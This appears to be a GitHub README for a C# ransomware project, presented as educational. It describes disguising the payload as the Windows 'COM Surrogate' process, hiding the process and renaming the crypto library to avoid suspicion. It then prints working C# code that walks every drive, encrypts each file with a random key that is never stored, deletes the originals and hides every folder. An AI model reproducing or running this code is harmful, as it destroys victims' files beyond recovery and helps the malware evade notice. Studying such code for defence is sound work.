Ransomware is a project written in C# 4.7 that shows how ransomware generally works. This repository should be used for educational reasons only!!

Abraham313/Ransomware
Ransomware


Folders

The Setup folder contains an Inno Setup script and the installer.

The BeforeSetup folder contains the files the setup installs.

The Projects folder contains the C# source code.

The stuff behind

The LustigeFehler.exe file is the main executable. When started, it shows some nonsense error messages.

If it is not run in admin mode, it crashes with an error. If the .exe is started in admin mode, it starts a new hidden process (not visible in the taskbar or as a GUI) called COM Surrogate in the background.

Why COM Surrogate? Because no one will ever expect a standard Windows process name to be running as a virus. In the background, our fake COM Surrogate.exe runs and tries to encrypt all files on all drives it finds.

Additionally, it hides every folder it finds. Furthermore, the AES crypto library is renamed to msvpc.dll so that suspicious users who look into the install folder do not get even more suspicious.

How is this possible? The following lines of code, taken from Main.cs, show the main ransomware code.

```csharp
// Excerpt from Main.cs as shown on the page; _random, Msvpc and Resources are
// defined elsewhere in the project.
private string GetRandomPassword()
{
   // SHA-512 over the local date plus a random int, returned as a hex string.
   // The value is never stored or sent anywhere, so nobody (including the
   // author) can recover the key once a file has been encrypted with it.
   var alg = SHA512.Create();
   alg.ComputeHash(Encoding.UTF8.GetBytes(DateTime.Now.ToLongDateString() + _random.Next(int.MaxValue)));
   return BitConverter.ToString(alg.Hash);
}

private void Run()
{
   // Walk every mounted drive; any error (e.g. an empty DVD drive) is swallowed.
   foreach (var drive in DriveInfo.GetDrives())
   {
      try
      {
         EncryptFs(drive.Name);
      }
      catch
      {
         // ignored
      }
   }
}

private void EncryptFs(string directory)
{
   // For each file: encrypt it to <stem> + Resources.Ending in the same folder
   // with a fresh per-file key, then delete the original.
   foreach (var file in Directory.GetFiles(directory))
   {
      try
      {
         if (file == null) continue;
         Msvpc.UseE(GetRandomPassword(), file,
            Path.Combine(directory, Path.GetFileNameWithoutExtension(file)) + Resources.Ending);
         File.Delete(file);
      }
      catch
      {
         // ignored
      }
   }

   // Recurse into every subfolder, hiding each one first.
   foreach (var dir in Directory.GetDirectories(directory))
   {
      HideDirectory(dir);
      EncryptFs(dir);
   }
}

private void HideDirectory(string dir)
{
   // Set the Hidden attribute on the directory if it is not already set.
   var di = new DirectoryInfo(dir);
   if ((di.Attributes & FileAttributes.Hidden) != FileAttributes.Hidden)
   {
      di.Attributes |= FileAttributes.Hidden;
   }
}

private bool IsElevated()
{
   // Elevation heuristic: an elevated token's owner SID is the Administrators
   // group rather than the user's own SID, so the two differ.
   var id = WindowsIdentity.GetCurrent();
   return id.Owner != id.User;
}
```

Virustotal.com scans

Well, let's see what virustotal.com shows us as information on this "virus":

Hint

Please don't try this software on your PC. It's for educational purposes only!!!!!!

Change history

  • Version 1.0.0.0 (2018-01-08) : 1.0 release.

Languages

  • C# 72.5%
  • Inno Setup 27.5%